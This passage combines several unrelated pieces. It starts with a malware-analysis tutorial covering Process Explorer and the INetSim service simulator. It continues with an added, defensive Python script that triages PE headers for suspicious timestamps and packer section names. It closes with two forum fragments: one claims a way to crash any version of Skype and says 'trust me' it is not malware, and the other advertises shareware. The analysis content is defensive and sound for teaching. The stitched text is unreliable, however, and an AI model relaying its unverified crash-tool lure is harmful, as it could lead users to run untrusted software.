Process Explorer is a tool used for performing dynamic analysis and can give you a great insight into the processes currently running on the system. Below is an example of the process being created after running a binary. Clicking on process can help you reveal whether the process has created any mutant or not. Also it can give you all the information about the DLLs being used by the function. Below, the screenshot shows that the process uses ws2_32.dll, which means that a network connection will be made by this process.

Double clicking a particular process will yield more information about the process. Some of the important attributes are:

Verify Option. There is a verify option in every process to check whether that binary is signed by the MS or not. Below, the screenshot depicts that this binary is not signed by the MS.

Threads will showcase the number of threads associated with this process.
Strings tab can help in determining whether any process replacement has occurred or not. If two strings are drastically different then the process replacement might have occurred. Below, the screenshot shows the strings in the executable both on disk and in memory.

Using INetSim

INetSim is a free Linux based suite for simulating common Internet services. It is sometimes difficult to analyze a malware without letting it completely execute the code and that can involve contacting the outer world for services over HTTP, HTTPS, FTP etc. INetSim does exactly this by emulating services like HTTP, HTTPS, FTP and allows the analyst to analyze the behaviour of malware. Since this is Linux based, the best way to use this is to install it on a Linux machine and keep it in the same network as that of the Windows testing machine.

INetSim can serve any type of request that the malware might request for. For example, suppose a malware requests for an image from the for its code to execute. INetSim can fulfil the request of the malware though the image will not be what malware will be looking for but it will keep the malware executing the code. INetSim can also log all the requests from the client regardless of the port. This can be used to record all the data sent from malware.

In the next series, we will move to advanced techniques of malware analysis using both static and dynamic analysis.

Source
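The IMAGE_FILE_HEADER timestamp and section-name checks from the static-analysis article above, as an added Python example that is not part of the original post. The header bytes are constructed by build_sample, and the allow-list of section names and the 1993 cutoff are assumptions of this example.

```python
import struct
from datetime import datetime, timezone

# Section names the article lists, plus other common linker defaults (assumed allow-list).
COMMON = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata", ".bss", ".tls"}

def build_sample(timestamp, names):
    """Constructed header-only PE image for the demo; not a real sample."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew lives at offset 0x3C
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(names), timestamp, 0, 0, 0, 0x0102)
    return dos + b"PE\0\0" + file_hdr + b"".join(
        struct.pack("<8s32x", n.encode()) for n in names)

def parse_pe(data):
    """Return (TimeDateStamp as UTC datetime, section names) from the PE headers."""
    try:
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
        if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            raise ValueError("not a PE file")
        # IMAGE_FILE_HEADER follows the 4-byte signature.
        _, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
        table = e_lfanew + 24 + opt_size  # section table follows the optional header
        names = [struct.unpack_from("<8s", data, table + 40 * i)[0]
                 .rstrip(b"\0").decode("ascii", "replace") for i in range(nsec)]
    except struct.error as exc:
        raise ValueError("truncated PE headers") from exc
    return datetime.fromtimestamp(stamp, timezone.utc), names

def triage(data, now=None):
    """Return findings that deserve a closer look; the timestamp is attacker-controlled."""
    now = now or datetime.now(timezone.utc)
    compiled, names = parse_pe(data)
    findings = []
    if compiled > now:
        findings.append(f"compile time {compiled:%Y-%m-%d} is in the future")
    elif compiled.year < 1993:
        findings.append(f"compile time {compiled:%Y-%m-%d} is implausibly old")
    if any(n.startswith("UPX") for n in names):
        findings.append("UPX section names present: probably UPX-packed")
    odd = [n for n in names if n not in COMMON and not n.startswith("UPX")]
    if odd:
        findings.append("unusual section names: " + ", ".join(odd))
    return findings

if __name__ == "__main__":
    packed = build_sample(700000000, ["UPX0", "UPX1", ".rsrc"])  # constructed values
    print(triage(packed))
```

A plausible timestamp proves nothing, since the field can be set to any value; only an implausible one is evidence of tampering or of a toolchain that does not record the build time.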
  23. Hey, you can crash any version of Skype: read here. Hope you guys like it. Ya, I am not distributing malware, trust me.
  24. Nektra SpyStudio is an all-in-one tool for cyber security analysts, DevOps, QA engineers, and developers. This multi-tool is useful for application virtualization, troubleshooting Windows applications, application performance monitoring, malware analysis, and as a process monitor complement. Get it now Read more at Nothing found for - | SharewareOnSale